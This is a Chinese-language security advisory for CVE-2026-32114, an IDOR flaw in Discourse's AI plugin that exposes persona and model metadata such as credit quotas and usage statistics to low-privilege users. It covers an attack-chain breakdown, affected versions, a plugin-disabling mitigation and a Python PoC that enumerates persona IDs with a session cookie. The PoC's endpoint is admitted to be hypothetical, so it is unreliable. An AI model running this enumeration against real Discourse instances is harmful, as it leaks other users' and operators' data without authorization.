CVE-2026-32114 Discourse IDOR漏洞致信息泄露

漏洞信息

漏洞编号

CVE-2026-32114

漏洞类型

不安全的直接对象引用 (IDOR)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Discourse

漏洞概述

Discourse是一款广泛使用的开源讨论平台。在2026.3.0-latest.1等特定版本之前，系统存在不安全的直接对象引用（IDOR）漏洞。由于缺乏充分的访问控制，任何已登录的低权限用户均可利用该漏洞，通过网络请求直接获取AI人设、功能特性及大语言模型模型的内部元数据。泄露的信息涉及信用分配额度和使用统计等敏感数据。此问题主要影响机密性，暂未发现对系统完整性和可用性的影响。

技术细节

该漏洞的根本原因在于Discourse未能正确验证用户对特定资源对象的访问权限。具体而言，涉及AI功能相关的API端点存在IDOR缺陷。攻击者在通过低权限账户登录后，可以通过遍历或猜测目标对象的唯一标识符（如ID），构造特定的HTTP请求发送至服务器。由于服务器端仅验证了用户是否登录（PR:L），而未验证当前用户是否有权访问请求的特定AI人设或模型元数据，因此直接返回了敏感的JSON数据。这些数据包含了AI模型的配置详情、信用额度分配及使用情况统计。攻击无需复杂交互（UI:N）且攻击复杂度低（AC:L），这使得漏洞利用相对容易。虽然泄露的信息不涉及核心系统控制，但用户隐私和商业敏感数据的泄露仍构成风险。攻击者可利用此信息评估平台的AI资源消耗情况或进行进一步的侦察。

攻击链分析

STEP 1

侦察与访问

攻击者注册并登录Discourse平台，获取有效的低权限用户会话凭证。

STEP 2

识别端点

攻击者分析前端请求或API结构，定位到获取AI人设或模型元数据的API端点（如/admin/plugins/discourse-ai/ai-personas/{id}.json）。

STEP 3

IDOR利用

攻击者编写脚本，利用已登录的会话，遍历或猜测数字ID，向API端点发送大量GET请求。

STEP 4

信息泄露

服务器由于未验证用户对特定资源的所有权，直接返回了包含信用分配和使用统计的敏感元数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-32114 (Discourse IDOR)
# This script demonstrates the IDOR vulnerability by iterating through persona IDs.
# Requires a valid authenticated session cookie.

import requests

target_url = "https://target-discourse-instance.com"
# Hypothetical endpoint based on vulnerability description
endpoint = "/admin/plugins/discourse-ai/ai-personas/{persona_id}.json"

# Replace with a valid low-privilege user session cookie
session_cookie = "_forum_session=valid_low_priv_cookie_here;"

headers = {
    "Cookie": session_cookie,
    "User-Agent": "CVE-2026-32114-PoC"
}

print("[*] Starting IDOR scan for CVE-2026-32114...")

# Attempt to access metadata for IDs 1 to 50
for persona_id in range(1, 51):
    try:
        url = target_url + endpoint.format(persona_id=persona_id)
        response = requests.get(url, headers=headers, timeout=5)

        if response.status_code == 200:
            data = response.json()
            print(f"[+] IDOR Successful for ID {persona_id}:")
            print(f"    - Name: {data.get('name')}")
            print(f"    - Credits: {data.get('credits')}")
            print(f"    - Usage Stats: {data.get('usage')}")
        elif response.status_code == 403:
            # If we hit a 403, the server might be enforcing checks or the ID is restricted
            print(f"[-] Access Denied for ID {persona_id}")
        elif response.status_code == 404:
            pass  # ID likely does not exist
    except Exception as e:
        print(f"[!] Error connecting to target: {e}")
        break

print("[*] Scan complete.")

影响范围

Discourse < 2026.3.0-latest.1

Discourse < 2026.2.1

Discourse < 2026.1.2

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用系统中的Discourse AI插件以阻断漏洞利用路径。